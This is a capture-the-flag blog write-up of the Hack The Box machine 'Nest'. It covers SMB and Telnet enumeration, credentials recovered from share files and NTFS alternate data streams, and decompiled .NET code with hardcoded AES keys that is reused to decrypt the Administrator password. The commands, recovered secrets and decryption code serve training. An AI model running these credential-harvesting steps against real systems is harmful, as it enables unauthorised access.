Hack The Box Write-Up Nest - 10.10.10.178
Post
Cancel

# Hack The Box Write-Up Nest - 10.10.10.178

Look up at the stars and not down at your feet

Stephen Hawking

In this post, I’m writing a write-up for the machine Nest from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Nest is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

This box shows the concepts of enumeration. This box relies heavily on enumeration and basic knowledge of VB.NET scripting language. It is a CTF-like box and one big puzzle that you have to put back together after each step to be able to go to the next step. I really enjoyed this box, even though I was misled a few times by the files I found and misinterpreted. This box is one of the nicest boxes I did at Hack The Box, I have really enjoyed it.

Foothold

The Nmap port scan reveals to open ports, the 445/tcp for SMB and 4386/tcp. The last port is for an unknown service, I found that the HQK Reporting Service V1.2 is running in this port. It reachable through Telnet. I found some files but I was not able to open it. The DEBUG command needs a password, which I do not have (yet). Through the enumeration of SMB with Guest, I found the credentials for the TempUser in an alternative data stream from a TXT-file. I have now gained the foothold on this machine.

User

Because the user TempUser has more permission to access files and I found with this user a Visual Basic Script which needs to be decompiled. After decompiling, the code reveals that it hold a decrypted string. After doing some modification to this file for decryption of the string I found the password for the user account c.smith.

Root

The user c.smith holds interesting information on his home drive for HQK Reporting Service V1.2. With Powershell, I revealed an alternative data stream from the file Debug Mode Password.txt. This stream contains the DEBUG password for the HQK service. Through the DEBUG console, I discovered the HqkLdap.exe file. After decompiling this program with DotPeek. This program holds an encrypted password. After adding an oneliner to this script which I calling the decryption function, I get the Administrator password. With this password, I was able to get the root flag through making an SMB connection with the Administrator-account.

# Recon

## Port scan with Nmap

As always first the portscan with Nmap. I have added the -p- parameter to the scan, otherwise, the high port will not be detected.

1 nmap -p- -sC -sV -oA ./nmap/nest.txt 10.10.10.178 

The results of the portscan.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 Nmap scan report for 10.10.10.178 Host is up (0.15s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 4386/tcp open unknown | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSes sionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | Reporting Service V1.2 | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2 | Unrecognised command | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command> 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cg i-bin/submit.cgi?new-service : SF-Port4386-TCP:V=7.80%I=7%D=1/27%Time=5E2F5538%P=x86_64-pc-linux-gnu%r(NU SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2 SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\ SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\ SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21," SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\ SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\ SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20--- SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\ SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCooki SF:e,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionR SF:eq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,2 SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21, SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\ SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20 SF:command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2 SF:\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\. SF:2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2 SF:\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20R SF:eporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x2 SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>"); Host script results: |_clock-skew: -58m52s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-01-27T20:29:00 |_ start_date: 2020-01-27T19:50:09 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 789.14 seconds 

After the portscan I get the result that there are two open ports:

• 445/tcp (SMB)
• 4386/tcp (unknown)

# Enumeration with Telnet

The port 4386 is an unknown port and not default bound to a program or service. Nmap returns some useful information: It shows that I can run some commands.

1 2 3 4 5 6 7 8 9 10 11 ... Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command> ... 

have started by trying to search through the web browser http://10.10.10.178:4386, the website keeps loading fo a little time, but I’m patient, and the webserver is returning the following:

The service is expecting a command. I first tried to create a session with netcat to the server. A shell comes up, but cannot use any of the commands. Then I tried with Telnet.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ~$telnet 10.10.10.178 4386 Trying 10.10.10.178... Connected to 10.10.10.178. Escape character is '^]'. HQK Reporting Service V1.2 >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command>  Now I’m getting somewhere. The LIST command shows that I’m currently in the hqk directory. With the SETDIR commando’s I can change the directory. With SETDIR ../ I can go a level up, and I’ve searched through all of the directories and some useful files but I can’t open any of the files. The HELP command shows that I can use a DEBUG command, but this command needs a password. 1 2 3 4 5 6 7 8 >help debug DEBUG <Password> Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed Examples: DEBUG MyPassw0rd Attempts to enable debug mode by using the password "MyPassw0rd"  Let’s poke some around. After running around on the server I found some interesting directories in C:\Shared but again, none of the files can’t be opened or being downloaded. Let’s try the lower port for further enumeration. # Enumerate SMB I don’t have any user credentials yet. Sometimes it is possible to gain access as an anonymous user. For this step I use smbmap. I invoked this command below: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ~$ smbmap -u Guest -H 10.10.10.178 [+] Finding open SMB ports.... [+] User SMB session established on 10.10.10.178... [+] IP: 10.10.10.178:445 Name: 10.10.10.178 Disk Permissions Comment ---- ----------- ------- ADMIN$NO ACCESS Remote Admin C$ NO ACCESS Default share . dr--r--r-- 0 Tue Jan 28 10:38:36 2020 . dr--r--r-- 0 Tue Jan 28 10:38:36 2020 .. dr--r--r-- 0 Thu Aug 8 00:58:07 2019 IT dr--r--r-- 0 Mon Aug 5 23:53:41 2019 Production dr--r--r-- 0 Mon Aug 5 23:53:50 2019 Reports dr--r--r-- 0 Wed Aug 7 21:07:51 2019 Shared Data READ ONLY IPC$NO ACCESS Remote IPC Secure$ NO ACCESS . dr--r--r-- 0 Tue Jan 28 10:38:41 2020 . dr--r--r-- 0 Tue Jan 28 10:38:41 2020 .. dr--r--r-- 0 Fri Aug 9 17:08:23 2019 Administrator dr--r--r-- 0 Sun Jan 26 08:21:44 2020 C.Smith dr--r--r-- 0 Thu Aug 8 19:03:29 2019 L.Frost dr--r--r-- 0 Thu Aug 8 19:02:56 2019 R.Thompson dr--r--r-- 0 Thu Aug 8 00:56:02 2019 TempUser Users READ ONLY 

First tried the smbclient //10.10.10.178/Users. I’m entering a random password. But I do not have access to open any folder

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ~$smbclient //10.10.10.178/Users ~$ Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> recurse smb: \> ls . D 0 Tue Jan 28 10:38:41 2020 .. D 0 Tue Jan 28 10:38:41 2020 Administrator D 0 Fri Aug 9 17:08:23 2019 C.Smith D 0 Sun Jan 26 08:21:44 2020 L.Frost D 0 Thu Aug 8 19:03:01 2019 R.Thompson D 0 Thu Aug 8 19:02:50 2019 TempUser D 0 Thu Aug 8 00:55:56 2019 \Administrator NT_STATUS_ACCESS_DENIED listing \Administrator\* \C.Smith NT_STATUS_ACCESS_DENIED listing \C.Smith\* \L.Frost NT_STATUS_ACCESS_DENIED listing \L.Frost\* \R.Thompson NT_STATUS_ACCESS_DENIED listing \R.Thompson\* \TempUser NT_STATUS_ACCESS_DENIED listing \TempUser\* smb: \> 

With the command smbclient //10.10.10.178/Data I got a bite. I have access to the Shared folder. The file Welcome Email.txt in location \Shared\Templates\HR contains interesting information. I downloaded this file, with the use of the mget command, to my machine and read the contents of this file.

1 2 3 4 5 6 7 8 9 10 11 12 13 We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME> You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME> If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you. Username: TempUser Password: welcome2019 Thank you 

Cool! Now I got some credentials! The file says that we can make a network connection to a share.

# Intrusion

## TempUser

I created an SMB connection with this command below.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ~$smbclient //10.10.10.178/Users/ -U TempUser -W HTB-NEST ~$ Enter HTB-NEST\TempUser's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Jan 26 00:04:21 2020 .. D 0 Sun Jan 26 00:04:21 2020 Administrator D 0 Fri Aug 9 17:08:23 2019 C.Smith D 0 Sun Jan 26 08:21:44 2020 L.Frost D 0 Thu Aug 8 19:03:01 2019 R.Thompson D 0 Thu Aug 8 19:02:50 2019 TempUser D 0 Thu Aug 8 00:55:56 2019 10485247 blocks of size 4096. 6449705 blocks available smb: \> cd TempUser\ smb: \TempUser\> ls . D 0 Thu Aug 8 00:55:56 2019 .. D 0 Thu Aug 8 00:55:56 2019 New Text Document.txt A 0 Thu Aug 8 00:55:56 2019 10485247 blocks of size 4096. 6449705 blocks available smb: \TempUser\> 

There is a file New Text Document.txt. When I open this file… I find this file is empty. All that work for an empty file?! Although, maybe this file isn’t as empty as it seems. I want to get all the information from this file. I’ll do this with the allinfo.

1 2 3 4 5 6 7 8 smb: \TempUser\> allinfo "New Text Document.txt" altname: NEWTEX~1.TXT create_time: Thu Aug 8 12:55:56 AM 2019 CEST access_time: Thu Aug 8 12:55:56 AM 2019 CEST write_time: Thu Aug 8 12:55:56 AM 2019 CEST change_time: Thu Aug 8 12:56:02 AM 2019 CEST attributes: A (20) stream: [::$DATA], 0 bytes  Yep, this file is as empty as it is. There’s also no alternative data stream in it. I’ve got the user credentials TempUser:welcome2019. I created a connection with this user. 1 ~$ smbclient //10.10.10.178/Data/ --user TempUser -W NEST-HTB 

I downloaded all the files from the \IT\Configs directory. The other folders are empty. I investigated the files. In the file RU_config.xml I found an encrypted password of the user c.smith.

1 2 3 4 5 <?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>c.smith</Username> <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password> 

I placed the password in the hash.txt file and decoded it as base64 and try to run john against it. The decrypted password seems to be a complex password, but, this password isn’t working on SMB. Then I looked into the config.xml file, and this part of the script is very interesting:

1 2 3 4 5 6 7 8 9 10 ... <Find name="192" /> <Replace name="C_addEvent" /> </FindHistory> <History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" /> </History> ...  I have no access to the location //10.10.10.178/Secure$ with smbclient, it leaves me with an error denied message. It took me some hours to find out the next step. I found out that I can browse in this location, the cd command isn’t prohibited. I invoked this command:

1 2 3 4 5 6 7 8 9 10 11 12 13 ~$smbclient //10.10.10.178/Secure$ --user TempUser -W NEST-HTB Enter NEST-HTB\TempUser's password: Try "help" to get a list of possible commands. smb: \> cd IT\ smb: \IT\> ls NT_STATUS_ACCESS_DENIED listing \IT\* smb: \IT\> cd Carl smb: \IT\Carl\> ls . D 0 Wed Aug 7 21:42:14 2019 .. D 0 Wed Aug 7 21:42:14 2019 Docs D 0 Wed Aug 7 21:44:00 2019 Reports D 0 Tue Aug 6 15:45:40 2019 VB Projects D 0 Tue Aug 6 16:41:55 2019 

I walked through all the files and directories and downloaded the files to my machine for further investigation. Compile Visual Basic Project (Visual Studio)

I put all the files together and it seems that I have downloaded a Visual Basic project with the name RU Scanner. The project file I placed in C:\%path%\VB Projects\WIP\RU\RUScanner.sln. From this moment I switched to my Windows machine. On this machine, I’ve got Visual Studio 16.4.3 already installed. I opened the file RUScanner.sln.

Let’s start from the beginning. I build this project by right-clicking in RU Scanner in the Solution Explorer and then click ‘Build’. On C:\%PATH%\VB Projects\WIP\RU\RUScanner\bin\Debug there is now a file located, with the name DbProf.exe. When I run this file there are some errors visible.

According to tot the first error, I placed config.xml in the Debug folder and called DbProf.exe. Result: an empty line. Ok, the errors are gone, but no decrypted password.

The script needs some modification. When I read this script carefully there is an encryption and decryption section in the Utils.vb file. When I run the DBProf.exe the Module1 will be called and executed. This module is placed in the file Module1.vb. As this module contains no entries for decrypting the password, there is nothing happen. To get the decryption done, I need to pass the encrypted hash to this module and read the decrypted password. So, I ended up with two lines of code to get the decryption to do his thing:

I added these two lines of code:

1 2 Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")) Console.ReadLine() 

The file Module1.vb after the modification:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 Module Module1 Sub Main() Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml") Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)} Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")) Console.ReadLine() End Sub End Module 

Now, I can call this file again from the Command Line:

## Switch to user c.smith

With the password of the user c.smith I can create an SMB session. I invoked this command:

1 ~$smbclient //10.10.10.178/Users --user c.smith -W NEST-HTB  Go to the user.txt and download this file to my machine. 1 2 smb: \> cd C.smith smb: \C.smith\> mget user.txt  By opening this file I can read the user flag. 1 2 ~$ cat user.txt cf71b25404be5d84fd827e05f426e987 

# Privilege escalation to root

## Enumeration SMB

I can now do more enumeration with the user c.smith. There are interesting files on his home drive \C.Smith\HQK Reporting. I downloaded the files to my machine.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 smb: \C.Smith\HQK Reporting\AD Integration Module\> ls . D 0 Fri Aug 9 14:18:42 2019 .. D 0 Fri Aug 9 14:18:42 2019 HqkLdap.exe A 17408 Thu Aug 8 01:41:16 2019 10485247 blocks of size 4096. 6449680 blocks available smb: \C.Smith\HQK Reporting\AD Integration Module\> mget * Get file HqkLdap.exe? yes getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (67.5 KiloBytes/sec) (average 67.5 KiloBytes/sec) smb: \C.Smith\HQK Reporting\> ls . D 0 Fri Aug 9 01:06:17 2019 .. D 0 Fri Aug 9 01:06:17 2019 AD Integration Module D 0 Fri Aug 9 14:18:42 2019 Debug Mode Password.txt A 0 Fri Aug 9 01:08:17 2019 HQK_Config_Backup.xml A 249 Fri Aug 9 01:09:05 2019 10485247 blocks of size 4096. 6449723 blocks available smb: \C.Smith\HQK Reporting\> mget * Get file Debug Mode Password.txt? yes getting file \C.Smith\HQK Reporting\Debug Mode Password.txt of size 0 as Debug Mode Password.txt (0.0 KiloBytes/sec) (average 48.3 KiloBytes/sec) Get file HQK_Config_Backup.xml? yes getting file \C.Smith\HQK Reporting\HQK_Config_Backup.xml of size 249 as HQK_Config_Backup.xml (0.5 KiloBytes/sec) (average 21.5 KiloBytes/sec) smb: \C.Smith\HQK Reporting\> 

It seems that the file Debug Mode Password.txt is empty. Another empty file… Let’s start with this file, there has to be some content in this file, since it was not easy to get so far in this challenge. And for this one, is switched (again?) to my Windows machine. (Sorry guys, I’m a Windows Engineer…).

PowerShell is a Powerful tool in Windows. It can also be used to extract hidden data streams. From my Windows machine, I have created a Network Connection to the home folder of c.smith and invoked the commands below to get the contents of this file:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 PS Z:\C.Smith> cd '.\HQK Reporting\' PS Z:\C.Smith\HQK Reporting> ls Directory: Z:\C.Smith\HQK Reporting Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 9-8-2019 14:18 AD Integration Module -a---- 9-8-2019 01:08 0 Debug Mode Password.txt -a---- 9-8-2019 01:09 249 HQK_Config_Backup.xml PS Z:\C.Smith\HQK Reporting> Get-Item '.\Debug Mode Password.txt' -stream * PSPath : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting\Debug Mode Password.txt::$DATA PSParentPath : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting PSChildName : Debug Mode Password.txt::$DATA PSDrive : Z PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : False FileName : Z:\C.Smith\HQK Reporting\Debug Mode Password.txt Stream : :$DATA Length : 0 PSPath : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting\Debug Mode Password.txt:Password PSParentPath : Microsoft.PowerShell.Core\FileSystem::Z:\C.Smith\HQK Reporting PSChildName : Debug Mode Password.txt:Password PSDrive : Z PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : False FileName : Z:\C.Smith\HQK Reporting\Debug Mode .txt Stream : Password Length : 15 PS Z:\C.Smith\HQK Reporting> Get-Content '.\Debug Mode Password.txt' -stream Password WBQ201953D8w PS Z:\C.Smith\HQK Reporting>  I have got now the DEBUG password: WBQ201953D8w. I created a telnet session to 10.10.10.178 on port 4386 and enter the DEBUG mode by filling in the password. 1 2 3 4 5 6 7 8 ~$ telnet 10.10.10.178 4386 Trying 10.10.10.178... Connected to 10.10.10.178. Escape character is '^]'. HQK Reporting Service V1.2 >DEBUG WBQ201953D8w 

I have now more commands at my disposal:

1 2 3 4 5 6 7 8 9 10 --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> SERVICE SESSION SHOWQUERY <Query_ID> 

I need to poke around and try to find something interesting. In the directory LDAP, there is a file named ldap.conf with the contents:

1 2 3 4 5 Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4= 

Another encrypted password… I have copied the contents of this file to my machine. I need to put all of the pieces together starting with the file HqkLdap.exe. To know what this file is doing, I need to compile it.

# Decompile HqkLdap.exe (dotPeek)

To decompile this program I use dotPeek from JetBrains. I have downloaded this program from their website: https://www.jetbrains.com/decompiler/. I loaded this program into the software. The code got compiled by the software to C# code. After reading through the code, the class CR is interesting because in this part the password gets decrypted. I got an encrypted password from the Administrator account which needs to be decrypted, sounds logical anyway.

This part public static string DS(string EncryptedString) is calling for the encrypted string for decryption.

In my Visual Studio, I created a new CSharp project with the name decrypt_admin.cs and copied the contents of the CR class to this project. I ended up editing this file and added some lines which are calling this DS function with the encrypted password as a string.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 // HqkLdap.CR using System; using System.IO; using System.Security.Cryptography; using System.Text; public class CR { private const string K = "667912"; private const string I = "1L1SA61493DRV53Z"; private const string SA = "1313Rf99"; public static string DS(string EncryptedString) { if (string.IsNullOrEmpty(EncryptedString)) { return string.Empty; } return RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256); } public static string ES(string PlainString) { if (string.IsNullOrEmpty(PlainString)) { return string.Empty; } return RE(PlainString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256); } private static string RE(string plainText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize) { //Discarded unreachable code: IL_00b9 byte[] bytes = Encoding.ASCII.GetBytes(initVector); byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue); byte[] bytes3 = Encoding.ASCII.GetBytes(plainText); Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations); byte[] bytes4 = rfc2898DeriveBytes.GetBytes(checked((int)Math.Round((double)keySize / 8.0))); AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider(); aesCryptoServiceProvider.Mode = CipherMode.CBC; ICryptoTransform transform = aesCryptoServiceProvider.CreateEncryptor(bytes4, bytes); using (MemoryStream memoryStream = new MemoryStream()) { using (CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Write)) { cryptoStream.Write(bytes3, 0, bytes3.Length); cryptoStream.FlushFinalBlock(); byte[] inArray = memoryStream.ToArray(); memoryStream.Close(); cryptoStream.Close(); return Convert.ToBase64String(inArray); } } } private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize) { byte[] bytes = Encoding.ASCII.GetBytes(initVector); byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue); byte[] array = Convert.FromBase64String(cipherText); Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations); checked { byte[] bytes3 = rfc2898DeriveBytes.GetBytes((int)Math.Round((double)keySize / 8.0)); AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider(); aesCryptoServiceProvider.Mode = CipherMode.CBC; ICryptoTransform transform = aesCryptoServiceProvider.CreateDecryptor(bytes3, bytes); MemoryStream memoryStream = new MemoryStream(array); CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read); byte[] array2 = new byte[array.Length + 1]; int count = cryptoStream.Read(array2, 0, array2.Length); memoryStream.Close(); cryptoStream.Close(); return Encoding.ASCII.GetString(array2, 0, count); } } public static void Main(string[] args) { Console.WriteLine(DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=")); } } 

The last thing that I have to do now is to run the code and get the password decrypted. I decrypted the password with Fiddle.NET (https://dotnetfiddle.net/).

# Root the box

I entered now the last part of this box. I created an SMB session with the Administrator account and browsed to the desktop of the Administrator account and I have the root.txt.

1 2 3 4 5 ~# smbclient //10.10.10.178/C\$ --user Administrator -W NEST-HTB Enter NEST-HTB\Administrator's password: Try "help" to get a list of possible commands. smb: \> cd Users\Administrator\Desktop smb: \Users\Administrator\Desktop\> mget root.txt 

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)